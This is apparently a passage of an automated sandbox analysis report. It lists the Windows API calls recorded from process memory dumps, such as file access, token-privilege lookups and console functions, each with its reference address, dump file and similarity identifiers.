                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2104758828.0000000002820000.00000040.00000001.sdmp, Offset: 02820000, based on PE: false
                                                        Similarity
                                                        • API ID: CreateFile
                                                        • String ID:
                                                        • API String ID: 823142352-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • RegisterEventSourceW.ADVAPI32(?), ref: 02820DD6
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2104758828.0000000002820000.00000040.00000001.sdmp, Offset: 02820000, based on PE: false
                                                        Similarity
                                                        • API ID: EventRegisterSource
                                                        • String ID:
                                                        • API String ID: 1693822063-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetTokenInformation.KERNELBASE(?,00000E9C,9BC2BDD8,00000000,00000000,00000000,00000000), ref: 01D5BDBC
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2101338367.0000000001D5A000.00000040.00000001.sdmp, Offset: 01D5A000, based on PE: false
                                                        Similarity
                                                        • API ID: InformationToken
                                                        • String ID:
                                                        • API String ID: 4114910276-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • K32EnumProcessModules.KERNEL32(?,00000E9C,9BC2BDD8,00000000,00000000,00000000,00000000), ref: 01D5AFBE
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2101338367.0000000001D5A000.00000040.00000001.sdmp, Offset: 01D5A000, based on PE: false
                                                        Similarity
                                                        • API ID: EnumModulesProcess
                                                        • String ID:
                                                        • API String ID: 1082081703-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetVolumeInformationW.KERNELBASE(?,00000E9C,?,?), ref: 0282109E
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2104758828.0000000002820000.00000040.00000001.sdmp, Offset: 02820000, based on PE: false
                                                        Similarity
                                                        • API ID: InformationVolume
                                                        • String ID:
                                                        • API String ID: 2039140958-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • K32GetModuleInformation.KERNEL32(?,00000E9C,9BC2BDD8,00000000,00000000,00000000,00000000), ref: 01D5B0AE
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2101338367.0000000001D5A000.00000040.00000001.sdmp, Offset: 01D5A000, based on PE: false
                                                        Similarity
                                                        • API ID: InformationModule
                                                        • String ID:
                                                        • API String ID: 3425974696-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • SetConsoleCtrlHandler.KERNEL32(?,00000E9C,?,?), ref: 01D5A23E
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2101338367.0000000001D5A000.00000040.00000001.sdmp, Offset: 01D5A000, based on PE: false
                                                        Similarity
                                                        • API ID: ConsoleCtrlHandler
                                                        • String ID:
                                                        • API String ID: 1513847179-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetFileType.KERNELBASE(?,00000E9C,9BC2BDD8,00000000,00000000,00000000,00000000), ref: 02820819
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2104758828.0000000002820000.00000040.00000001.sdmp, Offset: 02820000, based on PE: false
                                                        Similarity
                                                        • API ID: FileType
                                                        • String ID:
                                                        • API String ID: 3081899298-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • SHGetFolderPathW.SHELL32(?,00000E9C,?,?), ref: 02820502
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2104758828.0000000002820000.00000040.00000001.sdmp, Offset: 02820000, based on PE: false
                                                        Similarity
                                                        • API ID: FolderPath
                                                        • String ID:
                                                        • API String ID: 1514166925-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 0282072D
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2104758828.0000000002820000.00000040.00000001.sdmp, Offset: 02820000, based on PE: false
                                                        Similarity
                                                        • API ID: CreateFile
                                                        • String ID:
                                                        • API String ID: 823142352-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • ReadFile.KERNELBASE(?,00000E9C,9BC2BDD8,00000000,00000000,00000000,00000000), ref: 028208E5
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2104758828.0000000002820000.00000040.00000001.sdmp, Offset: 02820000, based on PE: false
                                                        Similarity
                                                        • API ID: FileRead
                                                        • String ID:
                                                        • API String ID: 2738559852-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • SetThreadPreferredUILanguages.KERNEL32(?,00000E9C,?,?), ref: 01D5A94A
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2101338367.0000000001D5A000.00000040.00000001.sdmp, Offset: 01D5A000, based on PE: false
                                                        Similarity
                                                        • API ID: LanguagesPreferredThread
                                                        • String ID:
                                                        • API String ID: 842807343-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • RegisterEventSourceW.ADVAPI32(?), ref: 02820DD6
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2104758828.0000000002820000.00000040.00000001.sdmp, Offset: 02820000, based on PE: false
                                                        Similarity
                                                        • API ID: EventRegisterSource
                                                        • String ID:
                                                        • API String ID: 1693822063-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetTokenInformation.KERNELBASE(?,00000E9C,9BC2BDD8,00000000,00000000,00000000,00000000), ref: 01D5BDBC
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2101338367.0000000001D5A000.00000040.00000001.sdmp, Offset: 01D5A000, based on PE: false
                                                        Similarity
                                                        • API ID: InformationToken
                                                        • String ID:
                                                        • API String ID: 4114910276-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetDriveTypeW.KERNELBASE(?), ref: 02820FB0
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2104758828.0000000002820000.00000040.00000001.sdmp, Offset: 02820000, based on PE: false
                                                        Similarity
                                                        • API ID: DriveType
                                                        • String ID:
                                                        • API String ID: 338552980-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2104758828.0000000002820000.00000040.00000001.sdmp, Offset: 02820000, based on PE: false
                                                        Similarity
                                                        • API ID: ConsoleWrite
                                                        • String ID:
                                                        • API String ID: 2657657451-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • K32GetModuleInformation.KERNEL32(?,00000E9C,9BC2BDD8,00000000,00000000,00000000,00000000), ref: 01D5B0AE
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2101338367.0000000001D5A000.00000040.00000001.sdmp, Offset: 01D5A000, based on PE: false
                                                        Similarity
                                                        • API ID: InformationModule
                                                        • String ID:
                                                        • API String ID: 3425974696-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetConsoleScreenBufferInfo.KERNEL32 ref: 01D5BB2F
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2101338367.0000000001D5A000.00000040.00000001.sdmp, Offset: 01D5A000, based on PE: false
                                                        Similarity
                                                        • API ID: BufferConsoleInfoScreen
                                                        • String ID:
                                                        • API String ID: 3437242342-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 01D5AB1A
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2101338367.0000000001D5A000.00000040.00000001.sdmp, Offset: 01D5A000, based on PE: false
                                                        Similarity
                                                        • API ID: LookupPrivilegeValue
                                                        • String ID:
                                                        • API String ID: 3899507212-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • SetThreadUILanguage.KERNEL32(?), ref: 02821148
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2104758828.0000000002820000.00000040.00000001.sdmp, Offset: 02820000, based on PE: false
                                                        Similarity
                                                        • API ID: LanguageThread
                                                        • String ID:
                                                        • API String ID: 243849632-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • K32EnumProcessModules.KERNEL32(?,00000E9C,9BC2BDD8,00000000,00000000,00000000,00000000), ref: 01D5AFBE
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2101338367.0000000001D5A000.00000040.00000001.sdmp, Offset: 01D5A000, based on PE: false
                                                        Similarity
                                                        • API ID: EnumModulesProcess
                                                        • String ID:
                                                        • API String ID: 1082081703-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • ReadFile.KERNELBASE(?,00000E9C,9BC2BDD8,00000000,00000000,00000000,00000000), ref: 028208E5
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2104758828.0000000002820000.00000040.00000001.sdmp, Offset: 02820000, based on PE: false
                                                        Similarity
                                                        • API ID: FileRead
                                                        • String ID:
                                                        • API String ID: 2738559852-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • CreateFileW.KERNELBASE(?,?,?,?,?,?,?), ref: 01D5BA7E
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2101338367.0000000001D5A000.00000040.00000001.sdmp, Offset: 01D5A000, based on PE: false
                                                        Similarity
                                                        • API ID: CreateFile
                                                        • String ID:
                                                        • API String ID: 823142352-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • SetConsoleTextAttribute.KERNEL32(?,?), ref: 0282132F
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2104758828.0000000002820000.00000040.00000001.sdmp, Offset: 02820000, based on PE: false
                                                        Similarity
                                                        • API ID: AttributeConsoleText
                                                        • String ID:
                                                        • API String ID: 646522457-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2101338367.0000000001D5A000.00000040.00000001.sdmp, Offset: 01D5A000, based on PE: false
                                                        Similarity
                                                        • API ID: Flags
                                                        • String ID:
                                                        • API String ID: 3401871038-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • UnmapViewOfFile.KERNELBASE(?), ref: 02820640
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2104758828.0000000002820000.00000040.00000001.sdmp, Offset: 02820000, based on PE: false
                                                        Similarity
                                                        • API ID: FileUnmapView
                                                        • String ID:
                                                        • API String ID: 2564024751-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetSystemInfo.KERNELBASE(?), ref: 0282099C
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2104758828.0000000002820000.00000040.00000001.sdmp, Offset: 02820000, based on PE: false
                                                        Similarity
                                                        • API ID: InfoSystem
                                                        • String ID:
                                                        • API String ID: 31276548-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 01D5AB1A
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2101338367.0000000001D5A000.00000040.00000001.sdmp, Offset: 01D5A000, based on PE: false
                                                        Similarity
                                                        • API ID: LookupPrivilegeValue
                                                        • String ID:
                                                        • API String ID: 3899507212-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetConsoleOutputCP.KERNEL32 ref: 01D5AA71
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2101338367.0000000001D5A000.00000040.00000001.sdmp, Offset: 01D5A000, based on PE: false
                                                        Similarity
                                                        • API ID: ConsoleOutput
                                                        • String ID:
                                                        • API String ID: 3985236979-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetFileType.KERNELBASE(?,00000E9C,9BC2BDD8,00000000,00000000,00000000,00000000), ref: 02820819
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2104758828.0000000002820000.00000040.00000001.sdmp, Offset: 02820000, based on PE: false
                                                        Similarity
                                                        • API ID: FileType
                                                        • String ID:
                                                        • API String ID: 3081899298-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2104758828.0000000002820000.00000040.00000001.sdmp, Offset: 02820000, based on PE: false
                                                        Similarity
                                                        • API ID: ConsoleWrite
                                                        • String ID:
                                                        • API String ID: 2657657451-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetLogicalDrives.KERNELBASE ref: 01D5ABC9
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2101338367.0000000001D5A000.00000040.00000001.sdmp, Offset: 01D5A000, based on PE: false
                                                        Similarity
                                                        • API ID: DrivesLogical
                                                        • String ID:
                                                        • API String ID: 999431828-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • CreateFileW.KERNELBASE(?,?,?,?,?,?,?), ref: 01D5BA7E
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2101338367.0000000001D5A000.00000040.00000001.sdmp, Offset: 01D5A000, based on PE: false
                                                        Similarity
                                                        • API ID: CreateFile
                                                        • String ID:
                                                        • API String ID: 823142352-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • SetConsoleTitleW.KERNEL32(?), ref: 028201D0
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2104758828.0000000002820000.00000040.00000001.sdmp, Offset: 02820000, based on PE: false
                                                        Similarity
                                                        • API ID: ConsoleTitle
                                                        • String ID:
                                                        • API String ID: 3358957663-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetVolumeInformationW.KERNELBASE(?,00000E9C,?,?), ref: 0282109E
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2104758828.0000000002820000.00000040.00000001.sdmp, Offset: 02820000, based on PE: false
                                                        Similarity
                                                        • API ID: InformationVolume
                                                        • String ID:
                                                        • API String ID: 2039140958-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • SetConsoleCtrlHandler.KERNEL32(?,00000E9C,?,?), ref: 01D5A23E
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2101338367.0000000001D5A000.00000040.00000001.sdmp, Offset: 01D5A000, based on PE: false
                                                        Similarity
                                                        • API ID: ConsoleCtrlHandler
                                                        • String ID:
                                                        • API String ID: 1513847179-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • SetConsoleTextAttribute.KERNEL32(?,?), ref: 0282132F
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2104758828.0000000002820000.00000040.00000001.sdmp, Offset: 02820000, based on PE: false
                                                        Similarity
                                                        • API ID: AttributeConsoleText
                                                        • String ID:
                                                        • API String ID: 646522457-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetConsoleScreenBufferInfo.KERNEL32 ref: 01D5BB2F
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2101338367.0000000001D5A000.00000040.00000001.sdmp, Offset: 01D5A000, based on PE: false
                                                        Similarity
                                                        • API ID: BufferConsoleInfoScreen
                                                        • String ID:
                                                        • API String ID: 3437242342-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • SHGetFolderPathW.SHELL32(?,00000E9C,?,?), ref: 02820502
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2104758828.0000000002820000.00000040.00000001.sdmp, Offset: 02820000, based on PE: false
                                                        Similarity
                                                        • API ID: FolderPath
                                                        • String ID:
                                                        • API String ID: 1514166925-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetDriveTypeW.KERNELBASE(?), ref: 02820FB0
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2104758828.0000000002820000.00000040.00000001.sdmp, Offset: 02820000, based on PE: false
                                                        Similarity
                                                        • API ID: DriveType
                                                        • String ID:
                                                        • API String ID: 338552980-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • SetThreadPreferredUILanguages.KERNEL32(?,00000E9C,?,?), ref: 01D5A94A
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2101338367.0000000001D5A000.00000040.00000001.sdmp, Offset: 01D5A000, based on PE: false
                                                        Similarity
                                                        • API ID: LanguagesPreferredThread
                                                        • String ID:
                                                        • API String ID: 842807343-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • UnmapViewOfFile.KERNELBASE(?), ref: 02820640
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2104758828.0000000002820000.00000040.00000001.sdmp, Offset: 02820000, based on PE: false
                                                        Similarity
                                                        • API ID: FileUnmapView
                                                        • String ID:
                                                        • API String ID: 2564024751-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetLogicalDrives.KERNELBASE ref: 01D5ABC9
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2101338367.0000000001D5A000.00000040.00000001.sdmp, Offset: 01D5A000, based on PE: false
                                                        Similarity
                                                        • API ID: DrivesLogical
                                                        • String ID:
                                                        • API String ID: 999431828-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • SetThreadUILanguage.KERNEL32(?), ref: 02821148
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2104758828.0000000002820000.00000040.00000001.sdmp, Offset: 02820000, based on PE: false
                                                        Similarity
                                                        • API ID: LanguageThread
                                                        • String ID:
                                                        • API String ID: 243849632-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetSystemInfo.KERNELBASE(?), ref: 0282099C
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2104758828.0000000002820000.00000040.00000001.sdmp, Offset: 02820000, based on PE: false
                                                        Similarity
                                                        • API ID: InfoSystem
                                                        • String ID:
                                                        • API String ID: 31276548-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2101338367.0000000001D5A000.00000040.00000001.sdmp, Offset: 01D5A000, based on PE: false
                                                        Similarity
                                                        • API ID: Flags
                                                        • String ID:
                                                        • API String ID: 3401871038-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetConsoleOutputCP.KERNEL32 ref: 01D5AA71
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2101338367.0000000001D5A000.00000040.00000001.sdmp, Offset: 01D5A000, based on PE: false
                                                        Similarity
                                                        • API ID: ConsoleOutput
                                                        • String ID:
                                                        • API String ID: 3985236979-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • CloseHandle.KERNELBASE(?), ref: 01D5A9C8
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2101338367.0000000001D5A000.00000040.00000001.sdmp, Offset: 01D5A000, based on PE: false
                                                        Similarity
                                                        • API ID: CloseHandle
                                                        • String ID:
                                                        • API String ID: 2962429428-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • CloseHandle.KERNELBASE(?), ref: 01D5A9C8
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2101338367.0000000001D5A000.00000040.00000001.sdmp, Offset: 01D5A000, based on PE: false
                                                        Similarity
                                                        • API ID: CloseHandle
                                                        • String ID:
                                                        • API String ID: 2962429428-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2119690095.0000000005710000.00000040.00000001.sdmp, Offset: 05710000, based on PE: false
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2101314972.0000000001D52000.00000040.00000001.sdmp, Offset: 01D52000, based on PE: false
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2101314972.0000000001D52000.00000040.00000001.sdmp, Offset: 01D52000, based on PE: false
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Non-executed Functions

                                                        Executed Functions

                                                        APIs
                                                        • AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 01DFAD37
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.2103114209.0000000001DFA000.00000040.00000001.sdmp, Offset: 01DFA000, based on PE: false
                                                        Similarity
                                                        • API ID: AdjustPrivilegesToken
                                                        • String ID:
                                                        • API String ID: 2874748243-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 01DFAD37
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.2103114209.0000000001DFA000.00000040.00000001.sdmp, Offset: 01DFA000, based on PE: false
                                                        Similarity
                                                        • API ID: AdjustPrivilegesToken
                                                        • String ID:
                                                        • API String ID: 2874748243-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • NtQuerySystemInformation.NTDLL(?,?,?,?), ref: 01DFB329
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.2103114209.0000000001DFA000.00000040.00000001.sdmp, Offset: 01DFA000, based on PE: false
                                                        Similarity
                                                        • API ID: InformationQuerySystem
                                                        • String ID:
                                                        • API String ID: 3562636166-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • NtQuerySystemInformation.NTDLL(?,?,?,?), ref: 01DFB329
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.2103114209.0000000001DFA000.00000040.00000001.sdmp, Offset: 01DFA000, based on PE: false
                                                        Similarity
                                                        • API ID: InformationQuerySystem
                                                        • String ID:
                                                        • API String ID: 3562636166-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • SetConsoleTitleW.KERNEL32(?), ref: 028401D0
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.2108123811.0000000002840000.00000040.00000001.sdmp, Offset: 02840000, based on PE: false
                                                        Similarity
                                                        • API ID: ConsoleTitle
                                                        • String ID:
                                                        • API String ID: 3358957663-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 0284072D
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.2108123811.0000000002840000.00000040.00000001.sdmp, Offset: 02840000, based on PE: false
                                                        Similarity
                                                        • API ID: CreateFile
                                                        • String ID:
                                                        • API String ID: 823142352-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • RegisterEventSourceW.ADVAPI32(?), ref: 02840DD6
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.2108123811.0000000002840000.00000040.00000001.sdmp, Offset: 02840000, based on PE: false
                                                        Similarity
                                                        • API ID: EventRegisterSource
                                                        • String ID:
                                                        • API String ID: 1693822063-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetTokenInformation.KERNELBASE(?,00000E9C,9B028BEA,00000000,00000000,00000000,00000000), ref: 01DFBDBC
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.2103114209.0000000001DFA000.00000040.00000001.sdmp, Offset: 01DFA000, based on PE: false
                                                        Similarity
                                                        • API ID: InformationToken
                                                        • String ID:
                                                        • API String ID: 4114910276-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • K32EnumProcessModules.KERNEL32(?,00000E9C,9B028BEA,00000000,00000000,00000000,00000000), ref: 01DFAFBE
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.2103114209.0000000001DFA000.00000040.00000001.sdmp, Offset: 01DFA000, based on PE: false
                                                        Similarity
                                                        • API ID: EnumModulesProcess
                                                        • String ID:
                                                        • API String ID: 1082081703-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetVolumeInformationW.KERNELBASE(?,00000E9C,?,?), ref: 0284109E
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.2108123811.0000000002840000.00000040.00000001.sdmp, Offset: 02840000, based on PE: false
                                                        Similarity
                                                        • API ID: InformationVolume
                                                        • String ID:
                                                        • API String ID: 2039140958-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • K32GetModuleInformation.KERNEL32(?,00000E9C,9B028BEA,00000000,00000000,00000000,00000000), ref: 01DFB0AE
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.2103114209.0000000001DFA000.00000040.00000001.sdmp, Offset: 01DFA000, based on PE: false
                                                        Similarity
                                                        • API ID: InformationModule
                                                        • String ID:
                                                        • API String ID: 3425974696-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • SetConsoleCtrlHandler.KERNEL32(?,00000E9C,?,?), ref: 01DFA23E
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.2103114209.0000000001DFA000.00000040.00000001.sdmp, Offset: 01DFA000, based on PE: false
                                                        Similarity
                                                        • API ID: ConsoleCtrlHandler
                                                        • String ID:
                                                        • API String ID: 1513847179-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetFileType.KERNELBASE(?,00000E9C,9B028BEA,00000000,00000000,00000000,00000000), ref: 02840819
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.2108123811.0000000002840000.00000040.00000001.sdmp, Offset: 02840000, based on PE: false
                                                        Similarity
                                                        • API ID: FileType
                                                        • String ID:
                                                        • API String ID: 3081899298-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • SHGetFolderPathW.SHELL32(?,00000E9C,?,?), ref: 02840502
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.2108123811.0000000002840000.00000040.00000001.sdmp, Offset: 02840000, based on PE: false
                                                        Similarity
                                                        • API ID: FolderPath
                                                        • String ID:
                                                        • API String ID: 1514166925-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 0284072D
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.2108123811.0000000002840000.00000040.00000001.sdmp, Offset: 02840000, based on PE: false
                                                        Similarity
                                                        • API ID: CreateFile
                                                        • String ID:
                                                        • API String ID: 823142352-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • ReadFile.KERNELBASE(?,00000E9C,9B028BEA,00000000,00000000,00000000,00000000), ref: 028408E5
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.2108123811.0000000002840000.00000040.00000001.sdmp, Offset: 02840000, based on PE: false
                                                        Similarity
                                                        • API ID: FileRead
                                                        • String ID:
                                                        • API String ID: 2738559852-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • SetThreadPreferredUILanguages.KERNEL32(?,00000E9C,?,?), ref: 01DFA94A
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.2103114209.0000000001DFA000.00000040.00000001.sdmp, Offset: 01DFA000, based on PE: false
                                                        Similarity
                                                        • API ID: LanguagesPreferredThread
                                                        • String ID:
                                                        • API String ID: 842807343-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • RegisterEventSourceW.ADVAPI32(?), ref: 02840DD6
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.2108123811.0000000002840000.00000040.00000001.sdmp, Offset: 02840000, based on PE: false
                                                        Similarity
                                                        • API ID: EventRegisterSource
                                                        • String ID:
                                                        • API String ID: 1693822063-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetTokenInformation.KERNELBASE(?,00000E9C,9B028BEA,00000000,00000000,00000000,00000000), ref: 01DFBDBC
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.2103114209.0000000001DFA000.00000040.00000001.sdmp, Offset: 01DFA000, based on PE: false
                                                        Similarity
                                                        • API ID: InformationToken
                                                        • String ID:
                                                        • API String ID: 4114910276-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetDriveTypeW.KERNELBASE(?), ref: 02840FB0
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.2108123811.0000000002840000.00000040.00000001.sdmp, Offset: 02840000, based on PE: false
                                                        Similarity
                                                        • API ID: DriveType
                                                        • String ID:
                                                        • API String ID: 338552980-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.2108123811.0000000002840000.00000040.00000001.sdmp, Offset: 02840000, based on PE: false
                                                        Similarity
                                                        • API ID: ConsoleWrite
                                                        • String ID:
                                                        • API String ID: 2657657451-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
